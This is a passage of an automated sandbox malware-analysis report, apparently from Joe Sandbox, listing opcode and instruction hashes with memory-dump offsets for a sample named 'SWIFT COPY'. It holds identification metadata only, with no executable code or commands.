                                                                                              • Opcode ID: 2f3728178d1e4823e2fade36cf46f918f53e7479c9f498eaa34911d0b794d274
                                                                                              • Instruction ID: 8312fb32e11e578277dfc3e7a028b2373117a25c80b1b7c85ed55ac6309a9f04
                                                                                              • Opcode Fuzzy Hash: 2f3728178d1e4823e2fade36cf46f918f53e7479c9f498eaa34911d0b794d274
                                                                                              • Instruction Fuzzy Hash: 81219875200A11DBCB25DF29C801B46B7F9EF58B08F288468A549CBB61E371E842CF98
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: db805fbaadacd267a2f7f73fc726516c1f9e302229e9be51063b19c328cc804d
                                                                                              • Instruction ID: 881bcb4038e28724723b19833a566ccdeb3bfe3948c9a84aec362fa9c9c5d1cd
                                                                                              • Opcode Fuzzy Hash: db805fbaadacd267a2f7f73fc726516c1f9e302229e9be51063b19c328cc804d
                                                                                              • Instruction Fuzzy Hash: 3711E372380B21FBE72256599C05F6776D9DBD4B64F110428B748DB2C4EB70EC018795
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                              • Instruction ID: 9105da4072847f7ae46b27626899b5ea0a5e2a7e033131414c24a6a3399a83bd
                                                                                              • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                              • Instruction Fuzzy Hash: 90218C72A00209EFDF129F98CC40BAEBBF9EF88718F204459F904A7251D734DE508B50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                              • Instruction ID: dc905206621cd2c077534e35f5fb8b0e0ead1e1a30571267005fe197275b0fb1
                                                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                              • Instruction Fuzzy Hash: 0F11E276600605EFD7269F48CC42FAABBBCEB81758F108029F6049B180D675ED44CB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ae5c53154ad2ce1c7d691defb83a90c79c05a32825b1653ab899eec2ecb18586
                                                                                              • Instruction ID: e473f18050c38a88cbf3522e0e719758b2bb4e3d928bc6f1f237e61c2304c1e9
                                                                                              • Opcode Fuzzy Hash: ae5c53154ad2ce1c7d691defb83a90c79c05a32825b1653ab899eec2ecb18586
                                                                                              • Instruction Fuzzy Hash: 6C11EF31701611DBDB12CF4DC480A66BBEAAFCA718B1881ADFE08DF210D6B2E9018794
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f10929265c0ed042b5e7f5364b0856ef79adecd6c9137bfa67a14393e4c59ceb
                                                                                              • Instruction ID: 7bfc2e0d6d40853bd98b8e02777bc48157ff5bda67aa1d352e260003c52ce68b
                                                                                              • Opcode Fuzzy Hash: f10929265c0ed042b5e7f5364b0856ef79adecd6c9137bfa67a14393e4c59ceb
                                                                                              • Instruction Fuzzy Hash: C4216F75A00209DFCB14CF98C581AAEBBF5FB88318F2442ADE505A7311C771AD46CBD0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 39c4a9682ef75d4fe5bca5e3709cf4a16675168fc03a9e71eea8a439278b21a9
                                                                                              • Instruction ID: 50e8a4eeecd2cfb86696578afb57c0174bafa5103c6e41bdd2af01ad2c96aab0
                                                                                              • Opcode Fuzzy Hash: 39c4a9682ef75d4fe5bca5e3709cf4a16675168fc03a9e71eea8a439278b21a9
                                                                                              • Instruction Fuzzy Hash: E3218EB5510A01EFD7308F68C881B66B7ECFF44294F44882DE59AC7650DA75BC50CB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6a6ec459c1885f09134127b6b2da90b911548f892d0b4d854aa7c26ebedb38e6
                                                                                              • Instruction ID: 44fc88d60312dff30cbbb5dcde32b2d1c4eb957e24065f915cd2ce44461d561a
                                                                                              • Opcode Fuzzy Hash: 6a6ec459c1885f09134127b6b2da90b911548f892d0b4d854aa7c26ebedb38e6
                                                                                              • Instruction Fuzzy Hash: B511C1B2240A14EBC722DB5DC941FDA7BA8EF99E68F014028F205DB361DA70EC01C7A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3534e13fe617a45e01cab75861c64045e63c3642a20bf3d716aeb6727fd7b354
                                                                                              • Instruction ID: fa995efb1ed83e1b07fda578b2046ebde2df3429dc085420d784e1d480ecc556
                                                                                              • Opcode Fuzzy Hash: 3534e13fe617a45e01cab75861c64045e63c3642a20bf3d716aeb6727fd7b354
                                                                                              • Instruction Fuzzy Hash: 42110C723001249BCF19DB29DC45A6BB66ADBD5778B258539DD22CB350EA309D41C790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c26152da43446b70af4acd0711edb7ca20ae9037033676e0d999ddbad6e735fc
                                                                                              • Instruction ID: 8a71e44fa091983b63900180835e5dd25a3a745b744eab6ef0385406bb614a23
                                                                                              • Opcode Fuzzy Hash: c26152da43446b70af4acd0711edb7ca20ae9037033676e0d999ddbad6e735fc
                                                                                              • Instruction Fuzzy Hash: 181123B2A00205DFCB25CF5DD481A1AFBFCEF94294F068079E905AB318E638DD00CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                              • Instruction ID: fd5b19d28f0f338af430abcadd0cd9c0f233757e8c564bb5ecf5bc476e46e935
                                                                                              • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                              • Instruction Fuzzy Hash: 3F11C436A00919AFDB19CB58CC05B9EFBF5EF84214F058269E95597340E671BD51CB80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                              • Instruction ID: 6c72e2f62cd6f418391eb13c75d3c23c11b10f6ad3b6c78f2bed338a60f8e94e
                                                                                              • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                              • Instruction Fuzzy Hash: 5F116A32600A05EFE7219A4DC880BD6BEE6EB45B58F058438EB19DB960EB71DC40DB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b7e9002d3fe929a543f5aa2deef1757c11cba649c31a63d67b333b9c34e995fa
                                                                                              • Instruction ID: f53f934a6e2fb49f97f0dc1a73c90a8623d8e00a9292410bea93ad47d655a7fc
                                                                                              • Opcode Fuzzy Hash: b7e9002d3fe929a543f5aa2deef1757c11cba649c31a63d67b333b9c34e995fa
                                                                                              • Instruction Fuzzy Hash: 43012631605689ABE716A2AED894F277F9CEF8175CF090075FD008B650D924DC00C2A1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2e3e5c7f526ca61968cd78e67ac3e0c07db882839fc75b83629d4b03ca65fa1d
                                                                                              • Instruction ID: a6f3d2bc218a42eb0e7eacfe5f746a0c3633bef5daf098b8bbf0f3fb93d5b49c
                                                                                              • Opcode Fuzzy Hash: 2e3e5c7f526ca61968cd78e67ac3e0c07db882839fc75b83629d4b03ca65fa1d
                                                                                              • Instruction Fuzzy Hash: 8411CE36200645AFDB36CF5ED840F567BA8EBD6B6CF04411AF9248B690C374E840CFA8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3521a62e96ce057f639c2f44d2cc1fb7eabf2b9ecccb547133c0940251985c2d
                                                                                              • Instruction ID: a5a08af3d9a71e87565083b407ad69cd153dabf008206155bc1c1dc5c8663dd2
                                                                                              • Opcode Fuzzy Hash: 3521a62e96ce057f639c2f44d2cc1fb7eabf2b9ecccb547133c0940251985c2d
                                                                                              • Instruction Fuzzy Hash: 19117336200A119BD7229A6AD844F67B7B5FFC5611F19452AEB86877A0DA30A802C790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: daf5e4c53106b9ca0d6d5b2791494d888ade6c85d95e107f0c1daa8a84500db6
                                                                                              • Instruction ID: 206c399068b2de8ec36214973ad8f543bef94db4b2a0dc590d81d1fb3fc9cd5a
                                                                                              • Opcode Fuzzy Hash: daf5e4c53106b9ca0d6d5b2791494d888ade6c85d95e107f0c1daa8a84500db6
                                                                                              • Instruction Fuzzy Hash: 9E11C2B2A00616ABDB21EF5DD981B5EFBBCEF847A4F504059DA01A7204D770AD018B94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e016c0c7fee3178471974a362bbd28b29c9b00f09b0a966787ae3dd459d4e8b7
                                                                                              • Instruction ID: f8a6bb38315d295763dcbf1763a38d476c1af1866312c87309daf39eb549da42
                                                                                              • Opcode Fuzzy Hash: e016c0c7fee3178471974a362bbd28b29c9b00f09b0a966787ae3dd459d4e8b7
                                                                                              • Instruction Fuzzy Hash: 3901DE715101099FD725DF29E404F66BBF9EB81B18F60817AE4048F271D770ED82CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                              • Instruction ID: be90d4a8564375ea0be36f9d2c95f4b6a92860bb8007b47dcbd7582dec650f8a
                                                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                                              • Instruction Fuzzy Hash: 8211E5722056C6DBEB23972CC944F257FDCAB01B4CF1904B0DE41C7A42F328D942C650
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                              • Instruction ID: f44ccc1680c176b06c4494389c67c1ee7be63765a46a7636d5de3301cb640833
                                                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                                              • Instruction Fuzzy Hash: 3201D232600115AFE7219F5CC882FDA7BA9EB80758F058034EB059BA60F775DD40D790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                              • Instruction ID: 07f4fff8d68a1e7c3169ca1d3751de65761574daf386861e4cf299a5c4b53fc3
                                                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                              • Instruction Fuzzy Hash: 780149314047369BCB319F19D840A727BF9FF56764700892DFC958BA81C332D400CB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2bad57eff53a677304c8aa9848bc9ab5597a98d39902a7ebe534ffe25fab7562
                                                                                              • Instruction ID: 96c14a29a912a0e0deebdc28185410928c5a3184608a0397c75256fe103c0693
                                                                                              • Opcode Fuzzy Hash: 2bad57eff53a677304c8aa9848bc9ab5597a98d39902a7ebe534ffe25fab7562
                                                                                              • Instruction Fuzzy Hash: 6701C472541511ABC733DF2E9840E13BBA8EB91774B1A4276EA689B2F6D630E801C7D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0564490ad64261439b34a4b61b10a29f8afd004af96ed15c3534a4b97c0ae92e
                                                                                              • Instruction ID: 270ef6b12dfa397f22c9061f01cdb317d417aaf1f973df31ade591774db3b3db
                                                                                              • Opcode Fuzzy Hash: 0564490ad64261439b34a4b61b10a29f8afd004af96ed15c3534a4b97c0ae92e
                                                                                              • Instruction Fuzzy Hash: 3C11AD32241241EFDB26EF19CD80F16BBB8FF98B58F200075ED059B6A1C235ED01CA90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2eb7b2e971b6eb3f37c68a07d0943e07c8d0c6a883fcfce0cc7d9f2a3f95ba07
                                                                                              • Instruction ID: 5b8b37eb7b61749edef526758464ba4dbc5dbf5897fd734e49cc1d9f25d51daf
                                                                                              • Opcode Fuzzy Hash: 2eb7b2e971b6eb3f37c68a07d0943e07c8d0c6a883fcfce0cc7d9f2a3f95ba07
                                                                                              • Instruction Fuzzy Hash: BB115A70541229ABDF35AB68CC42FE9B2B8FF44718F504194A318A60E0DB709E81CF88
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d0c72167e0d32ed46b9458bc16461cb80797b06abd6f46dc2756aa2c366691d7
                                                                                              • Instruction ID: 073b93308f72835cdc1aca99e43a398637531b959afdb54dacb879cf48fab1be
                                                                                              • Opcode Fuzzy Hash: d0c72167e0d32ed46b9458bc16461cb80797b06abd6f46dc2756aa2c366691d7
                                                                                              • Instruction Fuzzy Hash: 7F112DB390001DABCB21DB99CC85DDF777CEF48258F044166E506E7211EA34EA55CBE0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                              • Instruction ID: d46adb60ab5bddec0473374cc858be5f138954961f79e1ff2e7531161cb654ff
                                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                              • Instruction Fuzzy Hash: A30124322002108BEF12AA6DD880B97B76BBFC4708F1A40A9ED018F256EA71DC85C390
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b48472ce3f9b06c63ff4ac84edf2f38d68299588729e71607c1ccb6a9c0a82b3
                                                                                              • Instruction ID: 43136357c8da4a2e3daabb98935d84430b7169ddf5dae09656d34d03ea5cf9c5
                                                                                              • Opcode Fuzzy Hash: b48472ce3f9b06c63ff4ac84edf2f38d68299588729e71607c1ccb6a9c0a82b3
                                                                                              • Instruction Fuzzy Hash: 5411C472644146DFD711CF59D801BA6BBB9FB6A718F188159E848CF315D732EC81CBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5b67b43a995d93eab897ef9992aa5eddf5524fb31a326dc63a586554c6b36de0
                                                                                              • Instruction ID: 8007641b1a066280041b5054793adaa6b337850cbab714b9b062ad1482774d5a
                                                                                              • Opcode Fuzzy Hash: 5b67b43a995d93eab897ef9992aa5eddf5524fb31a326dc63a586554c6b36de0
                                                                                              • Instruction Fuzzy Hash: 3C11ECB1A002199BCB14DF99D581A9EBBF8FF58254F10406AE905E7351E674EA018BA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 28d5234aea2d82ef0523671c5823553665327000bf308676ca64ee6351c7c610
                                                                                              • Instruction ID: 1ad158abb511e2774c44ab3c71cad65b579d729a2ac089c639bc0cbc5657a142
                                                                                              • Opcode Fuzzy Hash: 28d5234aea2d82ef0523671c5823553665327000bf308676ca64ee6351c7c610
                                                                                              • Instruction Fuzzy Hash: 7801B1361402229BEB32AE19A440937BFF9FF91658B45847AF5456F611CB30EC81CBD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                              • Instruction ID: 447f29f89526e65712f1c875fb14686e0ae7b8138c78f50d89b50cfe7109e396
                                                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                              • Instruction Fuzzy Hash: 5301B532100755DFEB22B7AAD800EAB77EDFFD5658F04841AEA468B990DA74E441C760
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a4936d48b72a8a309f90f2b0f2e3f4eb77f9e9b0eb6d527f9a7d6b47e887ebc1
                                                                                              • Instruction ID: fe7acf8c11cb0446aa3d71b4023f52945ba03957757b40d14b4565f6742f99b3
                                                                                              • Opcode Fuzzy Hash: a4936d48b72a8a309f90f2b0f2e3f4eb77f9e9b0eb6d527f9a7d6b47e887ebc1
                                                                                              • Instruction Fuzzy Hash: 5B116D35A0020DEBDF25DF68D850EAE7BB9FB48248F004059E90197250E639AE11CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c7e50e26507feef97431de60b1d955f58526ed691aae3796714be8cf56d9b025
                                                                                              • Instruction ID: 2a712fcf5192b1fcd4dcf37690c363a034702676f44ffa9662379a54cab26400
                                                                                              • Opcode Fuzzy Hash: c7e50e26507feef97431de60b1d955f58526ed691aae3796714be8cf56d9b025
                                                                                              • Instruction Fuzzy Hash: EC01D471201515BBC711BB2DCD44E13BBECFF546587000525B605A3660DB24FC01C6E4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 98b8806d9086b1a6e98accb825ae6821802a817b6a95f2adc065a46d57b1a9d9
                                                                                              • Instruction ID: e4f7fc8ccbfe5debace87d00c3daaefae206256d26660df90716b770c07bef49
                                                                                              • Opcode Fuzzy Hash: 98b8806d9086b1a6e98accb825ae6821802a817b6a95f2adc065a46d57b1a9d9
                                                                                              • Instruction Fuzzy Hash: EB014CB6214206DBD330DF6DC889967BBE8FF48A68F10412DE95987280E730AD11C7D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 66719dc3f086cf9f1eb8c610d162e6e9d86639a9c31f88480ddac4d3b96ac82c
                                                                                              • Instruction ID: 3a522a5f672b1ee4928637f5acb59746b037b927ce592428b603303c4215857c
                                                                                              • Opcode Fuzzy Hash: 66719dc3f086cf9f1eb8c610d162e6e9d86639a9c31f88480ddac4d3b96ac82c
                                                                                              • Instruction Fuzzy Hash: 3B115E71A0020DEBDB25DF68C890EEE7BB5EB48244F004059FD01A7750EA38EE11CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4242f918f210900c0c190948c3e0950ccd762c00007421ac6dd70ea2dfd93d4b
                                                                                              • Instruction ID: 340ecf57876b893fd1bcf77e16829c6a11fe075ea4661621bb33bc9f04e7fe66
                                                                                              • Opcode Fuzzy Hash: 4242f918f210900c0c190948c3e0950ccd762c00007421ac6dd70ea2dfd93d4b
                                                                                              • Instruction Fuzzy Hash: CA1127B16183099FC710DF69D48199BBBE8EF99614F00455ABA98D7391E634E900CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
